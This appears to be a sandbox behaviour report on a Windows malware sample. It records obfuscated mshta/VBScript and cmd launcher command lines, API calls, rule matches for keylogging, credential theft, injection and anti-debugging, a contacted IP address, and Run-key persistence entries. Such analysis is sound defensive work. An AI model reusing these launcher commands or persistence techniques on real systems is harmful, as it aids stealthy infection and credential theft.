cmdline CMd.ExE /q/c cOPY /y "C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF "/p9CkDrncOIjEyCJoKJOSPrvHhMc " == "" for %r in ("C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe" ) do taskkill -Im "%~nxr" -F > NUl
file C:\Users\test22\Documents\RBbvNFh5vuSSLqivOTU8yu1R.exe
file C:\Users\test22\Documents\ofymRQhBaCBJsDIbtv8QxXiD.exe
file C:\Users\test22\Documents\FbLQwhWvNXEkfh5ddzkhlud2.exe
file C:\Users\test22\Documents\nL9CgWrUdtIUqXpY6oJaJIyM.exe
file C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe
file C:\Users\test22\AppData\Local\Temp\9ETO.DC
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "uj1otAn268mpyDOEos1bNvOh.exe")
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: CMd.ExE
parameters: /q/c cOPY /y "C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF "" == "" for %r in ("C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe" ) do taskkill -Im "%~nxr" -F > NUl
filepath: CMd.ExE
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: CMd.ExE
parameters: /q/c cOPY /y "C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF "/p9CkDrncOIjEyCJoKJOSPrvHhMc " == "" for %r in ("C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe" ) do taskkill -Im "%~nxr" -F > NUl
filepath: CMd.ExE
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://crl.comodo.net/TrustedCertificateServices.crl0
url http://users.ocsp.d-trust.net03
url http://crl.ssc.lt/root-b/cacrl.crl0
url http://crl.securetrust.com/STCA.crl0
url http://crl.securetrust.com/SGCA.crl0
url http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url http://www.ssc.lt/cps03
url http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url http://www.pkioverheid.nl/policies/root-policy0
url http://cps.chambersign.org/cps/chambersroot.html0
url http://www.e-szigno.hu/SZSZ/0
url http://www.entrust.net/CRL/Client1.crl0
url http://crl.chambersign.org/publicnotaryroot.crl0
url http://crl.comodo.net/AAACertificateServices.crl0
url http://www.certplus.com/CRL/class3.crl0
url http://logo.verisign.com/vslogo.gif0
url http://www.acabogacia.org/doc0
url http://www.disig.sk/ca/crl/ca_disig.crl0
url https://www.catcert.net/verarrel
url http://www.sk.ee/cps/0
url http://www.quovadis.bm0
url https://www.catcert.net/verarrel05
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url http://crl.chambersign.org/chambersroot.crl0
url http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url http://crl.globalsign.net/root-r2.crl0
url http://certificates.starfieldtech.com/repository/1604
url http://www.d-trust.net0
url http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url http://crl.ssc.lt/root-a/cacrl.crl0
url http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url http://www.certicamara.com/certicamaraca.crl0
url http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url http://www.post.trust.ie/reposit/cps.html0
url http://qual.ocsp.d-trust.net0
url http://www2.public-trust.com/crl/ct/ctroot.crl0
url http://www.certicamara.com0
url http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
url http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
url http://www.comsign.co.il/cps0
url http://crl.usertrust.com/UTN-USERFirst-NetworkApplications.crl0
url http://www.microsoft.com/pki/crl/products/TrustListPCA.crl
url http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
url http://www.signatur.rtr.at/de/directory/cps.html0
url http://www.globaltrust.info0
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_files_operation
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_files_operation
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Create a COM server rule create_com_service
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications over P2P network rule network_p2p_win
description Communications over HTTP rule network_http
description File downloader/dropper rule network_dropper
description Communications over FTP rule network_ftp
description Communications over RAW socket rule network_tcp_socket
description Communications use DNS rule network_dns
description Communication using dga rule network_dga
description Escalade priviledges rule escalate_priv
description Take screenshot rule screenshot
description Run a keylogger rule keylogger
description Steal credential rule cred_local
description Record Audio rule sniff_audio
description APC queue tasks migration rule migrate_apc
description Malware can spread east-west file rule spreading_file
description Malware can spread east-west using share drive rule spreading_share
description Create or check mutex rule win_mutex
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_private_profile
description Affect private profile rule win_files_operation
description Match Winsock 2 API library declaration rule Str_Win32_Winsock2_Library
description Match Windows Inet API library declaration rule Str_Win32_Wininet_Library
description Match Windows Inet API call rule Str_Win32_Internet_API
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x000002dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x000002e0
options: 0
access: 0x00000001
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000001
process_identifier: 3056
process_handle: 0x000001c4
0 0

NtTerminateProcess

status_code: 0x00000001
process_identifier: 3056
process_handle: 0x000001c4
1 0 0
cmdline mShta vBSCriPT: cloSE ( createOBjEcT ("WScRIPt.ShElL" ). RUN ( "CMd.ExE /q/c cOPY /y ""C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe"" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF """" == """" for %r in ( ""C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe"" ) do taskkill -Im ""%~nxr"" -F > NUl " , 0) )
cmdline mShta vBSCriPT: cloSE ( createOBjEcT ("WScRIPt.ShElL" ). RUN ( "CMd.ExE /q/c cOPY /y ""C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe"" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF ""/p9CkDrncOIjEyCJoKJOSPrvHhMc "" == """" for %r in ( ""C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe"" ) do taskkill -Im ""%~nxr"" -F > NUl " , 0) )
cmdline "C:\Windows\System32\mshta.exe" vBSCriPT: cloSE ( createOBjEcT ("WScRIPt.ShElL" ). RUN ( "CMd.ExE /q/c cOPY /y ""C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe"" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF """" == """" for %r in ( ""C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe"" ) do taskkill -Im ""%~nxr"" -F > NUl " , 0) )
cmdline CMd.ExE /q/c cOPY /y "C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF "" == "" for %r in ("C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe" ) do taskkill -Im "%~nxr" -F > NUl
cmdline "C:\Windows\System32\mshta.exe" vBSCriPT: cloSE ( createOBjEcT ("WScRIPt.ShElL" ). RUN ( "CMd.ExE /q/c cOPY /y ""C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe"" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF ""/p9CkDrncOIjEyCJoKJOSPrvHhMc "" == """" for %r in ( ""C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe"" ) do taskkill -Im ""%~nxr"" -F > NUl " , 0) )
cmdline "C:\Windows\System32\cmd.exe" /q/c cOPY /y "C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF "/p9CkDrncOIjEyCJoKJOSPrvHhMc " == "" for %r in ("C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe" ) do taskkill -Im "%~nxr" -F > NUl
cmdline "C:\Windows\System32\cmd.exe" /q/c cOPY /y "C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF "" == "" for %r in ("C:\Users\test22\Documents\uj1otAn268mpyDOEos1bNvOh.exe" ) do taskkill -Im "%~nxr" -F > NUl
cmdline CMd.ExE /q/c cOPY /y "C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe" PnN9X7~.exe >NUl && stArT PnN9X7~.exe /p9CkDrncOIjEyCJoKJOSPrvHhMc & IF "/p9CkDrncOIjEyCJoKJOSPrvHhMc " == "" for %r in ("C:\Users\test22\AppData\Local\Temp\PnN9X7~.exe" ) do taskkill -Im "%~nxr" -F > NUl
cmdline taskkill -Im "uj1otAn268mpyDOEos1bNvOh.exe" -F
buffer Buffer with sha1: ee1276fe9e6473a0624655b241f5e47d3abe5bb8
buffer Buffer with sha1: e43c7dd80c551ce01c20bd6b0df03914e2dff1eb
host 203.159.80.228
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\JZLIgvMgKKUfIsUZwb3YHyA5PcvyvhBJ reg_value C:\Users\test22\AppData\Local\Temp\du.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ZP2DAYvmIKBADIO6HPwFOY6rtQIL9Nvm reg_value C:\Users\test22\Documents\dIpLK0UolCjl8itepjhxY1rV.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\aUw57QoNQ7cyhtbhVlpIEmHASLTtPjn5 reg_value C:\Users\test22\Documents\HF9OheAjvPvrYsgJdN2blsSS.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\YZjsWS81liyQ6IKAzl0XhmhxNwmw647q reg_value C:\Users\test22\Documents\rgL9b9gU8SlRste7zCJdgwva.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ThZIJsKCmyhfx0DJAT3otPXw1wejqL4q reg_value C:\Users\test22\Documents\HeWMLJe0hvVWYHsnl9B2S4Dv.exe
